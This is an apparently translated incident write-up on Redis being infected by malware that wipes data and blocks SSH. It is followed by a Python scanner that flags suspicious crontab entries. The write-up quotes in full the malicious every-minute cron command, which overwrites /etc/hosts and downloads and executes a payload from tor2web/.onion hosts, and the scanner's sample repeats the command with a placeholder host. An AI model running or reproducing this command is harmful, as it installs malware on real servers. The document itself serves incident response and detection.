Discovering and resolving the REDIS0006 malware

We noticed that the server could no longer be reached over SSH and, most critically, that the Redis data kept being wiped. It turned out that Redis had been compromised by malware, somewhat like the earlier crypto-mining malware. Its basic characteristics are:
1: it clears the Redis data on a schedule
2: SSH login fails, and still fails after changes are made
The malware lives in a cron job that runs every minute and does a number of things; I did not examine it in detail. The cron entry is:

*/1 * * * * (tbin=$(command -v passwd); bpath=$(dirname "${tbin}"); curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "to <bug-wget@gnu.org>" && wget="$f" && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi;  ${curl} -fsSLk --max-time 40 https://7xffbbbebumizpeg.tor2web.su/src/ldm2 -o ~/.ntp||${curl} -fsSLk --max-time 40 https://7xffbbbebumizpeg.tor2web.io/src/ldm2 -o ~/.ntp||${curl} -fsSLk --max-time 40 https://7xffbbbebumizpeg.onion.sh/src/ldm2 -o ~/.ntp||wget --quiet --no-check-certificate --timeout=40 https://7xffbbbebumizpeg.tor2web.su/src/ldm2 -O ~/.ntp||wget --quiet --no-check-certificate --timeout=40 https://7xffbbbebumizpeg.tor2web.io/src/ldm2 -O ~/.ntp||wget --quiet --no-check-certificate --timeout=40 https://7xffbbbebumizpeg.onion.sh/src/ldm2 -O ~/.ntp) && chmod +x ~/.ntp && sh ~/.ntp
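As an added defensive example (not part of the original post), here is a small Python scanner that flags crontab entries showing the traits of the cron job above: an every-minute schedule, a download from a tor2web/.onion gateway with TLS checks disabled, saving to a hidden file in $HOME and then chmod +x and executing it, or overwriting /etc/hosts. The sample crontab and the placeholderhost domain are constructed for the demonstration.

```python
import re

# Indicators drawn from the cron job quoted above; each maps to a reason string.
INDICATORS = [
    (re.compile(r'^\s*(\*|\*/1)(\s+\*){4}\s'), 'runs every minute'),
    (re.compile(r'https?://[^\s|)]*(tor2web\.|\.onion\b)', re.I), 'fetches from a tor2web/.onion gateway'),
    (re.compile(r'--no-check-certificate|\s-[fsSL]*k[fsSL]*\s'), 'disables TLS certificate verification'),
    (re.compile(r'-[oO]\s+~/\.[A-Za-z0-9_]+'), 'saves the download to a hidden file in $HOME'),
    (re.compile(r'chmod\s+\+x\s+(~/\.\S+)\s*&&\s*(?:sh|bash)\s+\1'), 'makes the download executable and runs it'),
    (re.compile(r'>\s*/etc/hosts'), 'overwrites /etc/hosts'),
]


def scan_crontab(text):
    """Return [(line_number, [reasons])] for every non-comment entry that trips an indicator."""
    findings = []
    for number, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith('#'):
            continue
        reasons = [reason for pattern, reason in INDICATORS if pattern.search(line)]
        if reasons:
            findings.append((number, reasons))
    return findings


# Constructed sample crontab: one benign entry and one shaped like the post's cron job.
# "placeholderhost" stands in for the real gateway hostname.
SAMPLE_CRONTAB = """\
# constructed sample, not a real crontab
0 3 * * * /usr/bin/certbot renew --quiet
*/1 * * * * (curl -fsSLk --max-time 40 https://placeholderhost.tor2web.su/src/ldm2 -o ~/.ntp||wget --quiet --no-check-certificate --timeout=40 https://placeholderhost.onion.sh/src/ldm2 -O ~/.ntp) && chmod +x ~/.ntp && sh ~/.ntp
"""

if __name__ == '__main__':
    for number, reasons in scan_crontab(SAMPLE_CRONTAB):
        print(f'line {number}: ' + '; '.join(reasons))
```

To use it on a live host, feed it the output of `crontab -l` for each user plus the contents of /etc/crontab and the files under /etc/cron.d; any line that trips several indicators at once deserves a look before the next minute's run.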
